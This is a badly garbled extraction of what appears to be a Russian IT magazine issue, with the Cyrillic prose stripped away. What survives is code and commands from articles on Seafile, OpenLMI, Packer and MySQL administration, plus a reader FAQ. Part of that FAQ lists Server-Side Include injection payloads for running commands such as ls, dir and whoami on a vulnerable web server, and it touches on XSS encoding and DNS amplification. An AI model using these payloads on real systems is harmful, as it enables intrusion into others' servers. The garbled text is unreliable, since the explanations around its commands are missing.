FileServer (HttpServer) , HTTP. , ,
Gunicorn.
.
Seafile Server , . Seafile.
Ccnet ,
Seafile .

SQLite, MySQL PostgreSQL.


Seafile

Seahub

, .


R
, , SQLite HTTP- Python , . LDAP , .
,
. , -
Seafile ,
.
nginx, MySQL Ubuntu.
MySQL:

$ sudo apt-get install mysql-server mysql-client python-mysqldb
,
Seafile (- ,
):

$ adduser seafile
$ passwd seafile
$ su - seafile
Seafile, , setup-seafile.sh
setup-seafile-mysql.sh. ,
.
,
Enter.
:
Please choose a way to initialize seafile databases 1,
.
What is the password of the mysql root user? root MySQL.
Enter the name for mysql user of seafile seafile.
Enter the password for mysql user seafile
.
MySQL- seafile
. nginx python-flup, - -:

$ su
$ apt-get install nginx python-flup
-
HTTPS- ( ), .
:

$ openssl genrsa -out privkey.pem 2048
$ openssl req -new -x509 -key privkey.pem -out cacert.pem -days 1095
nginx (/etc/nginx/sites-available/seafile.
conf):

server {
    listen 80;
    server_name www.example.com;
    rewrite ^ https://$http_host$request_uri? permanent;
}

server {
    listen 443;
    ssl on;
    ssl_certificate /etc/ssl/cacert.pem;
    ssl_certificate_key /etc/ssl/privkey.pem;
    server_name www.example.com;

    location / {
        fastcgi_pass    127.0.0.1:8000;
        fastcgi_param   SCRIPT_FILENAME     $document_root$fastcgi_script_name;
        fastcgi_param   PATH_INFO           $fastcgi_script_name;
        fastcgi_param   SERVER_PROTOCOL     $server_protocol;
        fastcgi_param   QUERY_STRING        $query_string;
        fastcgi_param   REQUEST_METHOD      $request_method;
        fastcgi_param   CONTENT_TYPE        $content_type;
        fastcgi_param   CONTENT_LENGTH      $content_length;
        fastcgi_param   SERVER_ADDR         $server_addr;
        fastcgi_param   SERVER_PORT         $server_port;
        fastcgi_param   SERVER_NAME         $server_name;
        fastcgi_param   HTTPS               on;
        fastcgi_param   HTTP_SCHEME         https;
        access_log      /var/log/nginx/seahub.access.log;
        error_log       /var/log/nginx/seahub.error.log;
    }

    location /seafhttp {
        rewrite ^/seafhttp(.*)$ $1 break;
        proxy_pass http://127.0.0.1:8082;
        client_max_body_size 0;
    }

    location /media {
        root /home/seafile/seafile-server-latest/seahub;
    }
}

, : HTTP- 443-
(HTTPS) - Seahub FastCGI. URL
www.example.com/seafhttp/. fileserver, ,
.
client_max_body_size 0.
/home/seafile/seafile/
ccnet/ccnet.conf

/home/seafile/seafile/seahab/seahub_
settings.py. :

SERVICE_URL = https://www.example.com
:

FILE_SERVER_ROOT = 'https://www.example.com/seafhttp'
. , nginx
Seafile:

$ cp /etc/nginx/sites-available/seafile.conf /etc/nginx/sites-enabled/seafile.conf
$ nginx -s reload
$ su seafile
$ ./seafile.sh start
$ ./seahub.sh start-fastcgi

Seafile
. , ,
,
, . Seafile .



rommanio@yandex.ru


OPENLMI


, ...

Linux . ,
. ,
, .
, .

OpenLMI,
.
SNMP. , : ,
/, - . ,
OID, , .
1996 DMTF,
,
WBEM Web-based enterprise management, Web-based
Web-UI, ,
HTTP, SSL, XML. SNMP, , ,
, CIM, Common
Information Model CQL/
WQL, , ,
SQL. , SQL, - .
. (Windows NT, Sun
Solaris) .
, - , .
, (CIM-)
,
. , , :
Linux
CIM-
WBEM, , Red Hat
OpenLMI, .

INFO
Ubuntu
WBEM
SBLIM
SFCB.

CIMOM
CIM-XML over HTTPS. HTTPS ,
, , ,
TCP- 5989 . ,
elephant. :

# scp root@elephant:/etc/Pegasus/server.pem /etc/pki/ca-trust/source/anchors/elephant-cert.pem
# update-ca-trust extract
( ),
pegasus.
WBEM , SNMP .
, , .
, OpenLMI

CIM-, .
Oracle,
Solaris, . ,
, , , ( ).

. YAWN
CLI OpenPegasus.
lmishell :

> c = connect("localhost", "root")


RHEL/CentOS
:

, , is :

# yum install tog-pegasus openlmi-*


# systemctl enable tog-pegasus.service
# systemctl start tog-pegasus.service

> c is not None

, , .
OpenLMI OpenPegasus, CIM- ( CIM Object Manager, CIMOM,
). OpenPegasus ,
, ,
. :
openlmi-account ;
openlmi-logicalfile ;
openlmi-networking ;
openlmi-service ;
openlmi-hardware .
Python, ()
C. CIMOM -, OpenLMI CLI.
, CentOS 7.
CLI , . ,
CLI
Python WBEM.

OpenLMI

, True.



, :

> query = ns.wql('SELECT Name FROM LMI_Account WHERE LoginShell = "/sbin/nologin" OR LoginShell = "/bin/false"')
> for result in query:
...     print result.property_value("Name")
,
root:

, , ,
:

> query = ns.wql('SELECT Name, UserPassword FROM LMI_Account WHERE Name = "root"')
> for result in query:
...     print result.property_value("UserPassword")

WQL

> ns = c.root.cimv2
, , :

> for user in ns.LMI_Account.instances():
...     print user.Name
, ,
LMI_Account, -

WQL PCI-

. , .
WQL , , ,
:

> import crypt
> cs = ns.PG_ComputerSystem.first_instance()
> accmgr = ns.LMI_AccountManagementService.first_instance()
> print accmgr.CreateAccount(Name="testuser", Password=crypt.crypt('test', crypt.mksalt(crypt.METHOD_SHA512)), System=cs)
, .
crypt .
PG_ComputerSystem, . accmgr,
.
(
) .
, CIM. -, ,
MOF-, OpenLMI
/var/lib/openlmi-registration/mof,
. -,
CIM, YAWN. , CentOS ( , ), - :

# wget "ftp://ftp.muug.mb.ca/mirror/fedora/linux/development/21/i386/os/Packages/y/yawn-0-0.18.20140318svn632.fc21.noarch.rpm"
# rpm -ivh yawn-0-0.18.20140318svn632.fc21.noarch.rpm
, name
.
WQL:

> query = ns.wql('SELECT Name FROM LMI_Account')
> for result in query:
...     print result.property_value("Name")
, . ,
, , .
,
,
, ,
, ( . ).
PCI:

> query = ns.wql('SELECT Name FROM LMI_PCIDevice')
> for result in query:
...     print result.property_value("Name")

, YAWN Apache SELinux .


:


, ...

    # Body of the "for i in range(2):" loop of the script
    (ret, outparams, err) = partmgr.SyncLMI_CreateOrModifyPartition(Extent=sdb, Size=200 * MEGABYTE)
    print_partition(outparams['Partition'])
# Third partition: no Size given
(ret, outparams, err) = partmgr.SyncLMI_CreateOrModifyPartition(Extent=sdb)
print_partition(outparams['Partition'])
sdb1 = ns.CIM_StorageExtent.first_instance({"Name": "/dev/sdb1"})
sdb2 = ns.CIM_StorageExtent.first_instance({"Name": "/dev/sdb2"})
sdb3 = ns.CIM_StorageExtent.first_instance({"Name": "/dev/sdb3"})
# ext3 on the first two partitions, XFS on the third
for part in sdb1, sdb2:
    print fsysmgr.SyncLMI_CreateFileSystem(FileSystemType=fsysmgr.LMI_CreateFileSystem.FileSystemTypeValues.EXT3, InExtents=[part])
print fsysmgr.SyncLMI_CreateFileSystem(FileSystemType=fsysmgr.LMI_CreateFileSystem.FileSystemTypeValues.XFS, InExtents=[sdb3])

# setsebool -P httpd_can_network_connect 1
http://localhost/
yawn .
- ,
.

CIM YAWN

# wget "http://dl.fedoraproject.org/pub/epel/beta/7/x86_64/epel-release-7-0.2.noarch.rpm"
# rpm -ivh epel-release-7-0.2.noarch.rpm

.
LMI
LMIshell Python,
,
. , GPT,
. , , , .
, :

, - ,
.
LMIshell LMI. , CentOS , EPEL7:

# yum install openlmi-scripts*



. , ,
:

#!/usr/bin/lmishell
c = connect('localhost')
ns = c.root.cimv2
MEGABYTE = 1024*1024

# Helper: print the device ID and size of a newly created partition
def print_partition(partition_name):
    partition = partition_name.to_instance()
    print "Created partition", partition.DeviceID, "with", partition.NumberOfBlocks * partition.BlockSize, "bytes."

sdb = ns.LMI_StorageExtent.first_instance({"Name": "/dev/sdb"})
partmgr = ns.LMI_DiskPartitionConfigurationService.first_instance({"Name": "LMI_DiskPartitionConfigurationService"})
fsysmgr = ns.LMI_FileSystemConfigurationService.first_instance({"Name": "LMI_FileSystemConfigurationService"})
gpt_style = ns.LMI_DiskPartitionConfigurationCapabilities.first_instance({"InstanceID": "LMI:LMI_DiskPartitionConfigurationCapabilities:GPT"})
partmgr.SetPartitionStyle(Extent=sdb, PartitionStyle=gpt_style)
# Create two partitions of 200 MB each
for i in range(2):

LMISHELL PYTHON,
,



: / ,
DNS-
, , ,
'storage' . ':cd', ':pwd' ':..' ( ':cd ..').
,
Shorewall (, EPEL ). ,
:

lmi> :cd sw
>sw> search shorewall
shorewall-0:4.6.3-1.el7.
noarch. :

>sw> install shorewall-0:4.6.3-1.el7.noarch


, :

>sw> list files shorewall-0:4.6.3-1.el7.noarch



:

# lmi -h localhost
lmi> storage partition-table create --gpt /dev/sdb
lmi> storage partition create /dev/sdb 200m
lmi> storage partition create /dev/sdb 200m
lmi> storage partition create /dev/sdb
lmi> storage fs create ext3 /dev/sdb1
lmi> storage fs create ext3 /dev/sdb2
lmi> storage fs create xfs /dev/sdb3


Shorewall

, .
: /
, DNS-, bridging- bonding-. DNS- enp0s3:


, ,
,
LMISHELL
I -

, OpenLMI-:
NOF-, .
. Python , CIMOM, : enum_instances()
CIM, get_instance() , set_instance() ,
/, delete_instance() , , ,
cim_method__() -
.
MOF-
openlmi-mof-register provider.mof provider.reg
/usr/lib/python2.7/site-packages/lmi.
.

>sw> remove shorewall-0:4.6.3-1.el7.noarch

lmi> net dns add enp0s3 8.8.8.8


, , , LMIshell, ,
. ,
, , lmi
.

OpenLMI .
, Linux
. , CIM ,
.
, . , .
,
. , . , CIM-,
, OpenLMI-,
,
, . , Red Hat .
Technology Preview ,
. .



abaranov@itsumma.ru

SYN/ACK



PACKER,

DEVELOPMENT- PRODUCTION

Ociacia@shutterstock.com



VAGRANT
- , Vagrant, . Vagrant
, , . , , Chef Puppet- .
: www.vagrantup.com.


Web
, production development-. Vagrant
,
, Packer.


, LAMP Windows,
Denwer. -
, .
, .
,
, . - : !
-
, / : !
. , ,

,
development- production-
.
, .

PACKER?
, Vagrant, Packer.

, Amazon EC2, DigitalOcean, Docker, Google Compute
Engine, OpenStack, Parallels, QEMU, VirtualBox, VMware.

.
, Packer
, .
,
, , Amazon EC2 VirtualBox.
?
1. , , . ,

,
.
2. ,
, production.
,
, , -
- , PHP
.
3. production- development .

, , .
4. , , . ,
(, , !) ,

, ,

WWW
Amazon
Packer (goo.
gl/nF4TAC),


.

.
- . ,
, ,
, ,

, .
,
, Packer.


Packer www.packer.io. ,
Packer .

,
. Packer
.
, , Packer Amazon EC2 AMI.
Packer AMI :
amazon-ebs EBS-backed AMI
, (provisioning) AMI
;
amazon-instance instance-store AMI ,
S3;
amazon-chroot EBS-backed AMI
chroot .
,
AMI.

amazon-ebs.



R





IR


: , AMI ID ami-8cd8fdde
ap-southeast-1.
EC2 AMI , Snapshots root-EBS ,
.
-, AMI,
.

AMI
, . aws.amazon.
com, .
.
AWS,
IAM. AWS Identity and Access Management
(IAM)
AWS.
, Packer
//AMI.

Access Key. . 1 ,
.

: Access Key ID Secret
Access Key. , .
. User Policies
.
, Attach Policy Custom Policy,
. . 2.
Packer (goo.gl/yOIg6J). Apply Policy . , ,
IAM Policy Simulator, , , , Run Simulation
-

.
JSON-, Packer
AMI. , AMI ,
. 3. ,
,
Packer, :

. 1. IAM

. 2. IAM
. 3.
Amazon AMI
. 4. AMI Packer

, Packer
, - -. Packer
,
.
, Packer
Vagrant. . Vagrant ,
, Puppet
, Packer , production
.
- ,
Packer Puppet/Chef , . Packer
,
.
-
email abaranov@itsumma.ru.
2

$ packer build -var 'aws_access_key=some_key' \
    -var 'aws_secret_key=some_key_2' template.json

, bash.
provisioning , , Chef
Puppet. Packer
. t1.micro ,
,
.

Packer. , :

$ packer validate template.json


Template validated successfully.

$ packer build template.json


, . 4.


MYSQL


- ,
.
, . MySQL
.

urban.prankster

martin@synack.ru

karnoff@shutterstock.com

MySQL Workbench
MySQL

MySQL .
,
, , ,
, GUI
. Oracle MySQL Workbench (mysql.com/products/workbench)
Windows, Linux, OS X. , , . ,
, , . MS SQL Server, Sybase
ASE, PostgreSQL . . .
, , , . Community (OSS) Edition
GNU GPL. ,
Linux, Windows OS X. Red Hat /
CentOS EPEL, Ubuntu APT (dev.mysql.com/downloads/repo/apt).

$ wget -c http://dev.mysql.com/get/mysql-apt-config_0.2.1-1ubuntu14.04_all.deb
$ sudo dpkg -i mysql-apt-config_0.2.1-1ubuntu14.04_all.deb
$ sudo apt-get install mysql-workbench


:
YOUTU.BE/JQET_
QEET2I

phpMyAdmin
(phpmyadmin.net),
,
, , ,
, , /,
. -


SQL-.
.
,
,
, .
phpMyAdmin. , Apache,
nginx lighttpd. cPanel Plesk phpMyAdmin.
Windows HeidiSQL
(heidisql.com), MySQL, MS SQL
PostgreSQL ( )
Open Source .
,
, , / . , , ,
(CSV, HTML, XML, SQL, ...), , , . .
,
SSH-. Portable-, Wine,
*nix / OS X.
, , : SQLyog
(code.google.com/p/sqlyog), dbForge Studio for MySQL (devart.
com/ru/dbforge/mysql/studio), TOra (torasql.com), SQL Buddy
(sqlbuddy.com) .


, ,
. MySQL mysqladmin. SHOW QUERY LOG, SHOW
PROCESSLIST, SHOW VARIABLES, SHOW GLOBAL STATUS
, , . mysqldumpslow,
slow.log .
Enterprise
MySQL Enterprise Monitor,

MySQL. , , Open Source Nagios, Cacti, Zabbix,
Ganglia, . , Nagios
(nagios.com/solutions/mysql-monitoring). , , MySQL,
.
, ,
. .
, mytop (github.com/
jzawodn/mytop) (
, ), .
MySQL 3.23.41 InnoDB InnoDB Monitor innotop
(code.google.com/p/innotop), top
. Innotop
InnoDB, .
.

phpMyAdmin MySQL

innotop


,
.
2009 mycheckpoint (code.
openark.org/forge/mycheckpoint)

MySQL. .
, ( INSERT)
, MySQL,
Linux ( swap, ).
. SELECT-.
( Google Chart API), , . HTML-
-.
, email.
.
Python, . deb-, rpm- tar.gz-
. Ubuntu :

$ sudo apt-get install python-mysqldb
$ wget https://mycheckpoint.googlecode.com/files/mycheckpoint-231-1.deb
$ sudo dpkg -i mycheckpoint-231-1.deb

$ innotop -u root -p password



, . (Shift + )
, . , <Shift +
Q> . --write
.innotop/
innotop.conf:

$ innotop --write

$ mysql -uroot -ppassword
mysql> CREATE DATABASE mycheckpoint;
mysql> GRANT ALL PRIVILEGES ON mycheckpoint.* TO 'user'@'localhost' IDENTIFIED BY 'password';

mycheckpoint,


cron. MySQL- SMTP- :

$ mycheckpoint --user=user --password=password --host=server --port=3306
( /etc/mycheckpoint.cnf):

*/5 * * * * mycheckpoint --defaults-file=/root/mycheckpoint.cnf

SQL-.

$ mysql mycheckpoint -e "SELECT html FROM sv_report_html_brief" --silent --raw > ./checkpoint_report.html
, ,
MySQL- , MySQL Proxy (dev.mysql.com/downloads/
mysql-proxy). . Windows, *nix-.
,
MySQL ( 3306) PHP ( mysql.default_port
php.ini). Lua, .

MYSQL
, , .

, ,
, . ,
,
/ ( ,
). , (SOX, HIPAA
), , .
mysql_secure_installation, ,
.
, . , MySQL API. ,
MySQL audit_log Enterprise
(dev.mysql.com/doc/refman/5.5/en/audit-log-plugin.html).
Percona Server GPL-
(percona.com/doc/percona-server/5.5/management/audit_
log_plugin.html) , MySQL . , McAfee MySQL
Audit Plugin (github.com/mcafee/mysql-audit) MariaDB Audit
Plugin for MySQL (mariadb.com/kb/en/mariadb-audit-plugin117-release-notes), MariaDB, MySQL Percona Server,
,
MySQL.
.
, , .
, (Patrik Karlsson) (seclists.org/nmap-dev/2011/q2/att-814/
mysql-audit.nse) Nmap,
. Ubuntu
/usr/share/nmap/nselib/data nmap/script,
.

$ nmap -p 3306 1.1.1.1 --script mysql-audit \
    --script-args "mysql-audit.filename='/usr/share/nmap/nselib/data/mysql-cis.audit',mysql-audit.username='root',mysql-audit.password='password'"

pt-show-grants
,
. , ,
.

PERCONA TOOLKIT FOR MYSQL


, MySQL, , .
, ,
, . Percona Toolkit for MySQL (percona.com/
software/percona-toolkit)
Maatkit Aspersa ,
:
, ,
, , / .
4000 .
Linux ( Ubuntu percona-toolkit).
32 , pt-*,
. .
,
. ,
pt-summary ,
/proc/cpuinfo, /proc/meminfo, mount, df
, pt-show-grants
, pt-query-digest ,
, ,
, processlist tcpdump. ,
:

$ pt-query-digest slow.log
$ pt-query-digest --user=user --password=password --processlist --host=example.org
openark kit (code.openark.
org/forge/openark-kit) 14 ,
: ,
(, , ), ,
, ,
, .
BSD. Python python-mysqldb. deb- rpm , .
oak-security-audit,
,
, .
.

( --audit-level=strict):

$ oak-security-audit --socket=/var/run/mysqld/mysqld.sock --user=user --password=password


, ,
Passed, .
openark kit ( mycheckpoint,
, )
/var/run/mysqld/mysql.sock (
), Ubuntu mysqld.sock. ,
defaults-file. :
MySQL my.cnf. , . , oakblock-account,
. ,

(- REVOKE login ON *.*),
, . , ,

mysql> REVOKE ALL PRIVILEGES, GRANT OPTION FROM 'USER'@'%';
. ,

mysql> SHOW GRANTS FOR 'USER';
GRANT USAGE ON *.* TO 'USER'@'%' IDENTIFIED BY PASSWORD .....
, USAGE. REVOKE USAGE DROP
USER. ,
. , .
oak-block-account
, , .

oak-securityaudit

$ oak-block-account --block --account-user=USER --account-host=example.org
--kill . .
:

$ oak-block-account --list
MySQLTuner

$ oak-block-account --release --account-user=USER --account-host=example.org
openark kit . , oak-chunk-update UPDATE/DELETE
,
. oak-show-replication-status
, oak-kill-slow-queries , , oak-repeat-query , (
, ).

MYSQL
, ,
.
MySQL Perl-
MySQLTuner (mysqltuner.com), Linux.
MySQL,
( ) .
,
, , :

$ perl mysqltuner.pl

,
. , MySQLTuner
,
. .
*nix, CodePlex
(mysqltuner.codeplex.com)
Win. MySQL Performance
Tuning Primer Script (day32.com/MySQL/tuning-primer.sh), ,
.

, , must have ,
. ,
, , . ,
, MySQL.


Picaso 3D Designer

PICASO

DESIGNER

3D-

RepRap, 3D- MakerBot Replicator


Up!. Picaso 3D Designer, .


m.divizor@gmail.com

, , , . :
, , , . ,


RepRap. Picaso 3D Designer
. USB-
microSD,
3D- . , . MakerBot,
, , ,
, .
, LED-,
.
- ( ): MakerBot , 25 20
15 , Picaso 3D Designer , -, , -,
20 .

36 38 45 , , MakerBot (25 20 15)


Ferrum


,
USB, , -
,
microSD, ,
.
(
PLA- )


.


,
, ABS, .
.

, -
, .
,
, MakerBot, , . ,
.
,
. , ,
MakerBot,
.

, MakerBot, -.
USB ,
.
.
SD-: , .

.
Picaso 3D Designer
, , MakerBot, .


Picaso 3D Designer



30 3/,
50 .

0,27 .

,

, .

Interceptor Thingiverse
PLA
.

, Polygon
, 4 47 ,

MakerBot
5 .

Picaso 3D Designer
,
MakerBot, .
, , , 300 , , ,
, Replicator Gen5.

3D-, 3D-, (AutoCad, , 3ds Max,


SolidWorks, SketchUp, Blender, Rhinoceros ),
stl -. Polygon, Windows. slic3r,
. G-Code Picaso3D plg.
, , ,
. G-Code
.
MakerBot: , ()
. , , . G-Code Editor ,
, .
USB, Polygon : .
SD-, .


?
, , Replicator 5 (100
150 -).
, MakerBot , , -, , Wi-Fi-,

. 50 , 3D Designer Replicator 2,
- 100110 . ,

.


FAQ


Zemond

3em0nd@gmail.com


FAQ@REAL.XAKEP.RU

. -?
Burp Suite.
,
(bit.ly/
YksYOX). Burp Suite ,
-. BS ,
.
,
HTTP-, , - .
Burp Spider,
, .
,
URL . robots.txt, JavaScript ,

HTML. ,
.
OWASP ZAP (bit.
ly/1fjloVy),

Q
A

-
.
BackTrack .
SSI (ServerSide Includes
).
?
, , , . SSI
, HTML-
-. , , , SSI-

Q
A

, - .
HTML ,
,
. shtml shtm, - .
,
-,

shtml. SSI - , :

<!--#cmd var="value" -->


SSIcmd
;
var
SSI.

.
, input box,
,

<!--#exec cmd="ls" -->


.

SSI Linux- Windows-:
- Burp Suite

<!--#exec cmd="/bin/ls /" -->


Ubuntu
Hyper-V. , , . , ?
,
. . . .
, - .
, ,
.
.
,

Q
A


hv_vmbus
hv_storvsc
hv_blkvsc
hv_netvsc
hv_utils
.

sudo update-initramfs -u
.

nano /etc/network/interfaces
:

nano /etc/initramfs-tools/modules
:

auto seth0
iface seth0 inet static
address x.x.x.x
netmask x.x.x.x
gateway x.x.x.x
seth0.
Legacy, eth0.
dhcp, :

auto seth0
iface seth0 inet dhcp

.
lsmod
, ifconfig .

Ubuntu Hyper-V


SSI ,
HTML-

-
<!--#exec cmd="dir" -->
<!--#exec cmd="cd C:\WINDOWS\System32">
<!--#config errmsg="File not found, informs users and password"-->
<!--#echo var="DOCUMENT_NAME" -->
<!--#echo var="DOCUMENT_URI" -->
<!--#config timefmt="%A %B %d %Y %r"-->
<!--#fsize file="ssi.shtml" -->
<!--#include file=UUUUUUUU...UU-->
<!--#echo var="DATE_LOCAL" -->
<!--#exec cmd="whoami"-->



.
,
, , , .
?

. , , .
?
!
:

.
.
, , .
. , , , .
, ,
. ,
, .
.

cd .

.

cd ..

, , DHCP, IP-, OSI . , ,



. ? ,
wireshark , , .
, , ,
. ,
.

cd

cd

.
.
, ,
CMS . ?
, .
Nmap Zenmap,
. . ,
, CMS , WhatWeb (bit.ly/1qp5ZNi).
: 900
,
( ,
, ). , ,
. ,
. ,

whatweb domain.com

DNS, , , .
. -
, , Win/UNIX
. . ,
. . Bash power shell
, .

. -, , , .
, , ,
. .
. , ,
,
.

,
. , .
-, , , , . , ,
, , , , (
, Delphi, ). :
- ,
.


70 , DNS . reflection attack ( )


DNS- DoS- DDoS- .
, DNS, IP- , ,
. , ,
IP- .
. .

ALTER DATABASE db_name SET EMERGENCY, SINGLE_USER
GO

, MS SQL
Suspect ? : The database <nameBD> is not accessible.
.
( ), .
. MS SQL. mdf ldf- . Detach
database,
ldf Attach
database. mdf-
. mdf- ,

,
.
mdf-
.
, . mdf- , SQL Server Query analyzer
Management studio. :

.
,
,
.

ENC ,

EMERGENCY. , .

DBCC CHECKDB('db_name', REPAIR_ALLOW_DATA_LOSS)
GO

DBCC CHECKDB('db_name', REPAIR_REBUILD)
GO

WhatWeb

.
.
, ?
-
dnsinspect.com, .
, . ,

DNS-
: DNS UDP (,
) DNS-
.
.
Amplification attack ( ) DNS.
DNS-,

,
,

Q
A

Use master
go
sp_configure 'allow updates', 1
reconfigure with override
go

alter database db_name set ONLINE, MULTI_USER
GO
, .
.
,
. -
SQL inj,

?
! . : bit.
ly/1oR6OsT.
, MySQL, SQL Server, PostgreSQL,
Oracle.
, .

-.

R
bank power. , ?

, ,
.
, ( ),
. BP
,
.
,

.


500
, .

.

,
(
)
.

Power Bank


. ,
. - ?
!
, . IP
Webcam (bit.ly/YntE63) DroidCam Wireless
Webcam (bit.ly/ZdJ9Og).
, .
DroidCam Wi-Fi,
Bluetooth USB. IP Webcam Wi-Fi, ,
:
WebM, MOV
MPEG4;
WAV, Opus AAC
(AAC Android 4.1+);

Tasker ;
, ;

-.


, . , SATA
.

, ,
. . ( ,
, - ) , .
XSS,
?
, hex, Base64. , ?
, . , . - , ha.ckers.
org/xsscalc.html, ,
. , , ,
: yehg.net/encoding/?.
- ,
XSS. , ... , ,
. , , , .

. SAS.
SATA-. ?
SAS. ,
SATA.
SATA.
.
End-to-end data protection T10 SAS,
- , ,
,
. silent errors,
, . ,
silent errors SATA.
Multipath , , ,
, -

Q
A

SATA. , SAS- , :
;
-;
ERP-;

;
;
.

IP ,
10.10.1.15; , 22.

, .
PuTTY,
SSH.
,
, , ?
, , -

Q
A

SATA-, ,
, . ,
SATA-, :
, ;
;
;
, .
,
. SATA
.
. - RRL?
Response Rate
Limiting, DNS-,
DDoS-,
.
BIND, 9.9.4.

NSD (bit.ly/1qAtp1P) . , , BIND ,
. zonec
.
, ,
, .
, NSD , ,
, .

Q
A


SSH.
. , -
,
?

. .
10.10.1.15 255.255.255.0. , SSH
22- ,
. , :
IP , , 127.0.0.1, , , 2525;

mtr

. Telnet
nc, , , . ,
netcat,
(/),

, . , TCP-.
:

netstat -at
,
:

netstat -lantp | grep ESTABLISHED | awk '{print $5}' | awk -F: '{print $1}' | sort -u
ss,
.
netstat , .
.
lsof , . , Nmap,
,
.
mtr,
.
wireshark (https://www.
wireshark.org),

.
, , ,
, .

WWW 2.0
144

01
UBLOCK (bit.ly/1uDwOxB)
Adblock Plus, ,
. uBlock , , ,
,
. ABP, ,
,
uBlock. . ,
ABP,
Chromium.

03
MONITORBOOK (https://monitorbook.com/)
Monitorbook .
-
Google Alert. - . ,
.
eBay, , .
App Store / Google Play / Steam, : , (
, ). Monitorbook ,
.

DIMENSIONS (bit.ly/XnZGhi)

Dimensions Chrome, , . ,
, ,
Dimensions.
, . ,
- . ,
, Dimensions : , , , , .
PNG
JPEG.

Adblock Plus

02
CLOUDTUNES (https://github.com/jakubroztocil/cloudtunes)
CloudTunes , Dropbox,
YouTube. , -, ,
,
MongoDB Redis. , , ,
,
MusicBrainz. ,
.
. , .

04